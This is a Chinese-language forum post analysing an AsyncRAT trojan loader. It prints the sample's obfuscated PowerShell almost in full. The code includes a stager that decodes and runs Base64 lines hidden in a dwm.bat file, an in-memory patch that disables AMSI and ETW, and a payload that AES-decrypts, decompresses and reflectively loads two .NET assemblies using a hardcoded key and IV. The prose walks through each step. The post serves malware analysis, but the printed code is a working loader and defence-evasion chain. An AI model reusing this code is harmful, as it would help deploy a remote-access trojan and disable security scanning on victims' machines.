本帖最后由 图钉鱼 于 2025-6-15 22:29 编辑
衍生物
AsyncRAT木马
VirusTotal - File - 14fc76ea31a4f4c93a2d12199de031e90c8f92be97ade17367bef06421676c70
- $uvqtjaiirypxwtd=$env:USERNAME
- $xhpvggdoyemnqyo="C:\Users\$uvqtjaiirypxwtd\dwm.bat"
- $vlqwvtjzmwkfhsa='Test'+'-Path'
- if(&$vlqwvtjzmwkfhsa $xhpvggdoyemnqyo){
- $gofgsuqspyrhrpx=[System.IO.File]::('Read'+'AllLines')($xhpvggdoyemnqyo,[System.Text.Encoding]::UTF8)
- foreach($nsjdddgzyjohczw in $gofgsuqspyrhrpx){
- if($nsjdddgzyjohczw-match'^::: ?(.+)
- ){
- try{
- $awvyxxhkftftbye=[System.Convert]::('FromBase64'+'String')($matches[1].Trim())
- $mrkojswdpxaohwe=[System.Text.Encoding]::('Unicode').GetString($awvyxxhkftftbye)
- &('Invoke'+'-Expression')$mrkojswdpxaohwe
- break
- }catch{}
- }
- }
- }
- $iaobgsajaiaxsodksusnvnnyhqybot=@'
- $bxocmo = $emonv:USmoERNAMmoE;$rxmoki = mo"C:\Umosers\mo$bxocmo\dwm.mobat";mofunctmoion fmoveer(mo$paramom_varmo){ mo $aesmo_var=mo[Systmoem.Semocuritmoy.Crymoptogrmoaphy.moAes]:mo:Creamote();mo $moaes_vmoar.Momode=[Smoystemmo.Secumority.moCryptmoograpmohy.CimopherMmoode]:mo:CBC;mo $moaes_vmoar.Pamoddingmo=[Sysmotem.Smoecurimoty.Crmoyptogmoraphymo.PaddmoingMomode]::moPKCS7mo; mo$aes_movar.Kmoey=[Smoystemmo.Convmoert]:mo:FrommoBase6mo4Strimong('xmoPx62Tmo8l/21moyh6Rcmo6gH6hmoXK4uAmoA6ySSmo0q+jzmopKpjymoSQ=')mo; mo$aes_movar.ImoV=[Symostem.moConvemort]::moFromBmoase64moStrinmog('flmoxnnhomoAXdaJmow2nm6moPLR6Qmo==');mo $modecrymoptor_movar=$moaes_vmoar.CrmoeateDmoecrypmotor()mo; mo$retumorn_vamor=$democryptmoor_vamor.TramonsformomFinamolBlocmok($pamoram_vmoar, 0mo, $pamoram_vmoar.Lemongth)mo; mo$decrmoyptormo_var.moDispomose();mo $moaes_vmoar.Dimosposemo(); mo $remoturn_movar;}mofunctmoion qmogham(mo$paramom_varmo){ mo $rgvmocjblfmoqfoijmodp=Nemow-Objmoect Smoystemmo.IO.MmoemorymoStreamom(,$pmoaram_movar);mo $mobqguzmowcfcgmonixgzmo=New-moObjecmot Sysmotem.ImoO.MemmooryStmoream;mo $mopkxjtmoyakszmoubgoimo=New-moObjecmot Sysmotem.ImoO.Commopressmoion.GmoZipStmoream(mo$rgvcmojblfqmofoijdmop, [ImoO.Commopressmoion.CmoompremossionmoMode]mo::Decmoompremoss); mo $pmokxjtymoakszumobgoi.moCopyTmoo($bqmoguzwcmofcgnimoxgz);mo $mopkxjtmoyakszmoubgoimo.Dispmoose()mo; mo$rgvcmojblfqmofoijdmop.Dismopose(mo); mo $bqgmouzwcfmocgnixmogz.Dimosposemo(); mo $bqmoguzwcmofcgnimoxgz.TmooArramoy();}mofunctmoion gmohwux(mo$paramom_varmo,$parmoam2_vmoar){ mo $xmomappamoambppmoatvw=mo[Systmoem.Remoflectmoion.Amossembmoly]::mo('daomoL'[-1mo..-4]mo -joimon '')mo([bytmoe[]]$moparammo_var)mo; mo$soyrmopekzjmoqbfovmoe=$xmmoappaamombppamotvw.EmontryPmooint;mo $mosoyrpmoekzjqmobfovemo.Invomoke($nmoull, mo$paramom2_vamor);}$mohost.moUI.RamowUI.WmoindowmoTitlemo = $rmoxki;$modvhexmoqkdebmosofetmo=[Sysmotem.ImoO.Filmoe]::(mo'txeTmollAdamoeR'[-mo1..-1mo1] -jmooin 'mo')($rmoxki).moSplitmo([Envmoironmmoent]:mo:NewLmoine);moforeamoch ($moocvczmojgankmoludlcmo in $modvhexmoqkdebmosofetmo) { mo if mo($ocvmoczjgamonkludmolc.StmoartsWmoith('mo:: ')mo) mo{ mo $mounrrmmobkqrfmoogdlzmo=$ocvmoczjgamonkludmolc.Sumobstrimong(3)mo; mo bmoreak;mo }mo}$updmofpqgumopsonemoga=[smotringmo[]]$umonrrmbmokqrfomogdlz.moSplitmo('\')mo;$ggemopuxdimovfdzzmozm=qgmoham (mofveermo ([Comonvertmo]::FrmoomBasmoe64Stmoring(mo$updfmopqgupmosonegmoa[0])mo));$jmonbyqvmoryvlemovnca=moqghammo (fvemoer ([moConvemort]::moFromBmoase64moStrinmog($upmodfpqgmoupsonmoega[1mo])));moghwuxmo $ggemopuxdimovfdzzmozm $nmoull;gmohwux mo$jnbymoqvryvmolevncmoa (,[mostrinmog[]] mo('%*'mo));
- '@
- $nnssyvltsafhdjxjebuxwwoqeesfaw=$iaobgsajaiaxsodksusnvnnyhqybot-replace'mo',''
- &('Invoke'+'-Expression')$nnssyvltsafhdjxjebuxwwoqeesfaw
检索当前用户名 ($env:USERNAME) 并构建用户目录 (C:\Users\<username>\dwm.bat) 中名为 dwm.bat 的文件的路径。
检查是否存在dwm.bat。
如文件存在,它将从 dwm.bat 读取所有行作为 UTF-8 编码的文本。
Base64 解码和执行:
1.
在 dwm.bat 中遍历每一行。
查找以 ::: 开头的行(三个冒号后跟一个空格)。
尝试将 ::: 后面的内容解码为 Base64 字符串,然后将其从 Unicode 转换为字符串。
使用 Invoke-Expression 执行解码的字符串,该字符串将其作为 PowerShell 代码运行。
如在解码或执行过程中发生错误,会捕获异常并继续。
function Invoke-E1W {
[CmdletBinding()]
param (
[Parameter(Mandatory=$false, Position=0)]
[switch]$LgD,
[Parameter(Mandatory=$false, Position=0)]
[switch]$OptP
)
if ($LgD) { $VrbP = "Continue" }
try {
function Get-R3Z {
param ([string]$Bbl, [string]$SZb)
$Of3 = $R3d.GetMethod($BchN)
$Ams = $R3d.GetMethod($ZbN)
$mdH = $Of3.Invoke($null, @($Bbl))
$tmpR = New-Object IntPtr
$hR = New-Object System.Runtime.InteropServices.HandleRef($tmpR, $mdH)
$Ams.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$hR, $SZb))
}
function Get-MbS {
param (
[Parameter(Position=0, Mandatory=$true)]
[IntPtr]$PrtA,
[Parameter(Position=1, Mandatory=$true)]
[Type[]]$WzT,
[Parameter(Position=2)]
[Type]$EzT = [Void]
)
$Wlt = [AppDomain]::("Curren" + "tDomain")
$DfN = New-Object System.Reflection.AssemblyName('McrA')
$Bms = $Wlt.DefineDynamicAssembly($DfN, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$Bpl = $Bms.DefineDynamicModule('McrM', $false)
$Dbw = $Bpl.DefineType('McrK', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$Spn = $Dbw.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $WzT)
$Spn.SetImplementationFlags('Runtime, Managed')
$Hdl = $Dbw.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $EzT, $WzT)
$Hdl.SetImplementationFlags('Runtime, Managed')
$MbT = $Dbw.CreateType()
[System.Runtime.InteropServices.Marshal]::("GetDelegate" + "ForFunctionPointer")($PrtA, $MbT)
}
Add-Type -AssemblyName System.Windows.Forms -ErrorAction Stop
$D1a = [System.Runtime.InteropServices.Marshal]
$R3d = [Windows.Forms.Form].Assembly.GetType('System.Windows.Forms.UnsafeNativeMethods')
$ZbB = [Byte[]](0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73)
$BchB = [Byte[]](0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65)
$ZbN = [System.Text.Encoding]::ASCII.GetString($ZbB)
$BchN = [System.Text.Encoding]::ASCII.GetString($BchB)
$Of3 = $R3d.GetMethod($BchN)
$Ams = $R3d.GetMethod($ZbN)
$SZbB = [Byte[]](0x41,0x6D,0x73,0x69,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65)
$BblB = [Byte[]](0x61,0x6D,0x73,0x69,0x2E,0x64,0x6C,0x6C)
$Bbl = [System.Text.Encoding]::ASCII.GetString($BblB)
$SZb = [System.Text.Encoding]::ASCII.GetString($SZbB)
$N7S = Get-R3Z $Bbl $SZb
$GrZ = $D1a::SizeOf([Type][IntPtr])
if ($GrZ -eq 8) {
$Wkb = Get-MbS $N7S @([string], [UInt64].MakeByRefType()) ([Int])
[Int64]$Eprl = 0
}
else {
$Wkb = Get-MbS $N7S @([string], [IntPtr].MakeByRefType()) ([Int])
$Eprl = 0
}
$sSfx = 'Virt' + 'ualProtec'
$sMtd = '{0}{1}' -f $sSfx, 't'
$kBbl = "ker{0}.dll" -f "nel32"
$SAdr = Get-R3Z $kBbl $sMtd
$EGlm = Get-MbS $SAdr @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])
$S_OBS = 0x00000080
$GldB = [byte[]](0xb8,0x0,0x00,0x00,0x00,0xC3)
$Sld = 0
$KstX = 0
if ($Wkb.Invoke("Scanner", [ref]$Eprl) -ne 0) {
if ($Eprl -eq 0) { Throw "[!] No system component found." }
else { Throw "[!] Error initializing system component." }
}
if ($GrZ -eq 8) {
$Bch = $D1a::ReadInt64([IntPtr]$Eprl, 16)
$Kmp = $D1a::ReadInt64([IntPtr]$Bch, 64)
}
else {
$Bch = $D1a::ReadInt32($Eprl + 8)
$Kmp = $D1a::ReadInt32($Bch + 36)
}
while ($Kmp -ne 0) {
if ($GrZ -eq 8) {
$Zbt = $D1a::ReadInt64([IntPtr]$Kmp)
$Fkl = $D1a::ReadInt64([IntPtr]$Zbt, 24)
}
else {
$Zbt = $D1a::ReadInt32($Kmp)
$Fkl = $D1a::ReadInt32($Zbt + 12)
}
if (-not $EGlm.Invoke($Fkl, [uint32]6, $S_OBS, [ref]$Sld)) {
Throw "[!] Error changing memory settings at $Fkl"
}
try {
$D1a::Copy($GldB, 0, [IntPtr]$Fkl, 6)
}
catch {
Throw "[!] Error during optimization at $Fkl"
}
for ($i=0; $i -lt $GldB.Length; $i++) {
$Apl = $D1a::ReadByte([IntPtr]::Add($Fkl, $i))
if ($Apl -ne $GldB[$i]) { Throw "[!] Optimization failed at $Fkl" }
}
if (-not $EGlm.Invoke($Fkl, [uint32]6, $Sld, [ref]$Sld)) {
Throw "[!] Error restoring memory settings at $Fkl"
}
$KstX++
if ($GrZ -eq 8) {
$Kmp = $D1a::ReadInt64([IntPtr]$Bch, 64 + ($KstX * $GrZ))
}
else {
$Kmp = $D1a::ReadInt32($Bch + 36 + ($KstX * $GrZ))
}
}
if ($OptP) {
$Knch = [Byte[]](0x45,0x74,0x77,0x45,0x76,0x65,0x6E,0x74,0x57,0x72,0x69,0x74,0x65)
$Ppr = [System.Text.Encoding]::ASCII.GetString($Knch)
$Ltr = Get-R3Z ("nt{0}.dll" -f "dll") $Ppr
if (-not $EGlm.Invoke($Ltr, 1, $S_OBS, [ref]$Sld)) {
Throw "[!] Error changing memory settings for $Ppr"
}
try {
if ($GrZ -eq 8) {
$D1a::WriteByte($Ltr, 0xC3)
}
else {
$Kks = [byte[]](0xb8,0xff,0x55)
$D1a::Copy($Kks, 0, [IntPtr]$Ltr, 3)
}
}
catch {
Throw "[!] Error during optimization of $Ppr"
}
if (-not $EGlm.Invoke($Ltr, 1, $Sld, [ref]$Sld)) {
Throw "[!] Error restoring memory settings for $Ppr"
}
Write-Output " Connected."
}
else {
Write-Output " System maintenance completed."
}
}
catch {
Throw $_
}
}
Invoke-E1W -OptP
2.
混淆负载:
定义一个大型混淆字符串 ($iaobgsajaiaxsodksusnvnnyhqybot),其中包含具有故意拼写错误的 PowerShell 代码(例如,重复插入 mo)。
使用 -replace 'mo','' 删除 mo 字符以生成有效的 PowerShell 代码。
使用 Invoke-Expression 执行已清理的代码。
$iaobgsajaiaxsodksusnvnnyhqybot = @'
$bxoc = $env:USERNAME;
$rxoki = "C:\Users\$bxoc\dwm.bat";
function fveer($param_var){
$aes_var = [System.Security.Cryptography.Aes]::Create();
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key = [Convert]::FromBase64String('xPx62T8l/21yh6Rc6gH6hXK4uAA6ySS0q+jzpKpySQ=');
$aes_var.IV = [Convert]::FromBase64String('floxnhoAXdaJw2n6PLR6Q==');
$decryptor_var = $aes_var.CreateDecryptor();
$return_var = $decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose();
$aes_var.Dispose();
return $return_var;
}
function qgham($param_var){
$rgvcjblfqfoijdp = New-Object System.IO.MemoryStream(,$param_var);
$bqguzwcmofcgnimoxgz = New-Object System.IO.MemoryStream;
$pkxjtakszmoubgo = New-Object System.IO.Compression.GZipStream($rgvcjblfqfoijdp, [IO.Compression.CompressionMode]::Decompress);
$pkxjtakszmoubgo.CopyTo($bqguzwcmofcgnimoxgz);
$pkxjtakszmoubgo.Dispose();
$rgvcjblfqfoijdp.Dispose();
$bqguzwcmofcgnimoxgz.Dispose();
return $bqguzwcmofcgnimoxgz.ToArray();
}
function gmohwux($param_var, $param2_var){
$xmapambpvatvw = [System.Reflection.Assembly]::Load([byte[]]$param_var);
$soyrpekzjqbfove = $xmapambpvatvw.EntryPoint;
$soyrpekzjqbfove.Invoke($null, $param2_var);
}
$host.UI.RawUI.WindowTitle = $rxoki;
$dvhexqkdebmosofet = [System.IO.File]::ReadAllText($rxoki).Split([Environment]::NewLine);
foreach ($ocvmoczjgamonkludmolc in $dvhexqkdebmosofet) {
if ($ocvmoczjgamonkludmolc.StartsWith(':: ')) {
$umrrmbkqrfogdlz = $ocvmoczjgamonkludmolc.Substring(3);
break;
}
}
$updfpqgumopsonemoga = [string[]]$umrrmbkqrfogdlz.Split('\');
$ggemopuxdimovfdzz = qgham (fveer ([Convert]::FromBase64String($updfpqgumopsonemoga[0])));
$jmonbyqvmoryvlemovnca = qgham (fveer ([Convert]::FromBase64String($updfpqgumopsonemoga[1])));
gmohwux $ggemopuxdimovfdzz $null;
gmohwux $jmonbyqvmoryvlemovnca (,[string[]]@('%*'));
'@
$nnssyvltsafhdjxjebuxwwoqeesfaw = $iaobgsajaiaxsodksusnvnnyhqybot -replace 'mo',''
&('Invoke-Expression') $nnssyvltsafhdjxjebuxwwoqeesfaw
有效载荷分析: 在进行反混淆 (删除 mo) 后,负载将执行以下作:
定义三个功能:
fveer:使用 AES(CBC 模式,PKCS7 填充)和硬编码密钥和 IV(均为 Base64 编码)解密输入。
qgham: 使用 GZip 解压缩输入。
ghwux:使用 [System.Reflection.Assembly]::Load 将字节数组加载为 .NET 程序集并调用其入口点。
将控制台窗口标题设置为 dwm.bat 的路径。
再次读取 dwm.bat,查找以 :: 开头的行(两个冒号和一个空格)。
将 :: 之后的内容由 \ 拆分为数组。
使用 fveer 解码和解密数组中的两个 Base64 字符串,然后使用 qgham 解压缩它们。
将第一个解压缩的结果加载为 .NET 程序集并调用其入口点。
将第二个解压缩结果作为另一个程序集调用,并传递通配符参数 (%*)。
|
发表于 
